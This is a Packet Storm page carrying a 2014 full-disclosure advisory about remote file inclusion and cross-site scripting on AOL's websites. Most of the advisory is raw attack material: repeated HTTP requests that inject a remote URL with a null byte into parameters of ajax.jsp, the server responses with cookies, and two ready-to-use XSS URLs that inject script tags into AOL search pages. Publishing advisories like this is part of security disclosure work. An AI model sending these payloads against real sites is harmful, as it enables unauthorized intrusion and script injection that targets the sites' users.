Exploit the possiblities

AOL File Inclusion / Cross Site Scripting

AOL File Inclusion / Cross Site Scripting
Posted Jan 22, 2014
Authored by Juan Carlos Garcia

America Online (AOL) suffers from cross site scripting and remote file inclusion vulnerabilities.

tags | exploit, remote, vulnerability, code execution, xss, file inclusion
MD5 | 0d9462b1f15af5ece7e02a57bd97dabc

AOL File Inclusion / Cross Site Scripting

Change Mirror Download

AOL File Inclusion / Cross Site ScrIpting
*******************************


Time-Line vulnerability
------------------------

-Multiples Security Advisories

-Not Response

-Not FeedBack

-Not Fixed

-Another Security Advisory ( & another..)

-Not Response-Not FeedBack

-Full Disclosure


I. VULNERABILITY
-------------------------

#Title: AOL File Inclusion / Cross Site Scrpting

#Vendor:http://www.aol.com

#Author: Juan Carlos García (@secnight)
#Author: Francisco Moraga (@btshell)

www.asap-sec.com



II. DESCRIPTION
-------------------------

AOL Inc. (previously known as America Online, written as AOL and styled as "Aol." but commonly pronounced as an initialism) is an American multinational mass media corporation based in New York City that develops, grows, and invests in brands and web sites.
The company's business spans digital distribution of content, products, and services, which it offers to consumers,publishers, and advertisers.

Founded in 1983 as Control Video Corporation, an online services company by Jim Kimsey from the remnants of Control Video Corporation, AOL has franchised its services to companies in several nations around the world or to set up international versions of its services.AOL is headquartered at 770 Broadway in New York..


(Wikipedia)

III-Proof Of Concept
------------------


Remote File Inclusion
*******************


Vulnerability description
---------------------------


This script is vulnerable to file inclusion attacks.

It seems that this script includes a file which name is determined using user-supplied data.

This data is not properly validated before being passed to the include function.



Affected items
----------------

/ajax.jsp (5)


The impact of this vulnerability
--------------------------------
It is possible for a remote attacker to include a file from local or remote resources and/or
execute arbitrary script code with the privileges of the web-server.


How to fix this vulnerability
------------------------------
Edit the source code to ensure that input is properly validated. Where is possible, it is recommended to make a list of accepted filenames and restrict the input to that list.


Attack details
-----------------

URL encoded GET input m was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Error message found:

The requested resource (/aol/main/modules/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available

GET /ajax.jsp?ajax=1&cv=6&dlItem=432572&m=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&offset=0&p=dynamicleadslide&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-
config&_c=main5 HTTP/1.1

Referer: http://www.aol.com:80/

Cookie: tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a;

s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true;

JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D


Response


HTTP/1.1 200 OK

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=www.aol.com

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com

x-ua-compatible: IE=EmulateIE9

Pragma: no-cache

Cache-Control: no-cache, no-store, private, max-age=0

Expires: 0

Content-Type: text/javascript;charset=UTF-8

Content-Length: 130

Set-Cookie: JSESSIONID=C08A9752C9DF6FE072CF35073B14F824; Path=/aol

Set-Cookie: JSESSIONID=; Domain=aol.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive




Variant 1
-----------

URL encoded GET input m was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Error message found:

The requested resource (/aol/main/modules/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available


Request

GET /ajax.jsp?ajax=1&cv=6&dlItem=432572&m=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&offset=0&p=dynamicleadslide&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-
config&_c=main5 HTTP/1.1

Referer: http://www.aol.com:80/

Cookie: tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a;

s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true;

JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA

%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;

rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D


Response

HTTP/1.1 200 OK

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=www.aol.com

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com

x-ua-compatible: IE=EmulateIE9

Pragma: no-cache

Cache-Control: no-cache, no-store, private, max-age=0

Expires: 0

Content-Type: text/javascript;charset=UTF-8

Content-Length: 130

Set-Cookie: JSESSIONID=C08A9752C9DF6FE072CF35073B14F824; Path=/aol

Set-Cookie: JSESSIONID=; Domain=aol.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive


Variant 3
---------

URL encoded GET input p was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Error message found:

The requested resource (/aol/main/modules/dynamiclead/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available


Request

GET /ajax.jsp?ajax=1&cv=6&dlItem=432572&m=dynamiclead&offset=0&p=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-
config&_c=main5 HTTP/1.1

Referer: http://www.aol.com:80/

Cookie:

tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a;

s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true;

JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D



Variant 4
---------

Attack details
----------------
URL encoded GET input p was set to http://some-inexistent website.acu/some_inexistent_file_with_long_name?%00.jpg

Error message found:

The requested resource (/aol/main/modules/dynamiclead/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available


GET /ajax.jsp?ajax=1&cv=6&dlItem=431789&m=dynamiclead&offset=0&p=http%3a%2f%2fsome-inexistentwebsite.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-config&_c=main5

HTTP/1.1

Referer: http://www.aol.com:80/

Cookie: tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a;

s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true;

JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D


Response
----------
HTTP/1.1 200 OK

Cache-Control: max-age=5
Connection: Keep-Alive

Via: AOL-CACHE

x-ua-compatible: IE=EmulateIE9

Pragma: no-cache

test-timestamp: 1390300006644

Content-Type: text/javascript;charset=UTF-8

Content-Length: 142

Keep-Alive: timeout=5, max=100



Cross Site Scripting
*********************


http://search.aol.com/aol/webhome?s_chn=%3C/script%3E%3Cscript%3Ealert%28%22Secnight%20and%20BTshell%22%29;%3C/script%3E%3Cscript%3E


http://search.aol.co.uk/aol/webhome?s_chn=%3C%2Fscript%3E%3Cscript%3Ealert%28%22Secnight+and+BTshell+says..+Security+Advisory%3A+Not+FeedBack+Not+Response+Not+Fixed..+Full+Disclosure+asap-sec.com%22%29%3B%3C%2Fscript%3E%3Cscript%3E …


IV-Authors:
-----------
Juan Carlos García @secnight
Francisco Moraga @BTshell
ASAP Security As Soon As Possible

www-asap-sec.com

LEGAL NOTICES
--------------

The Authors accepts no responsibility for any damage caused by the use or misuse of this information.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    8 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close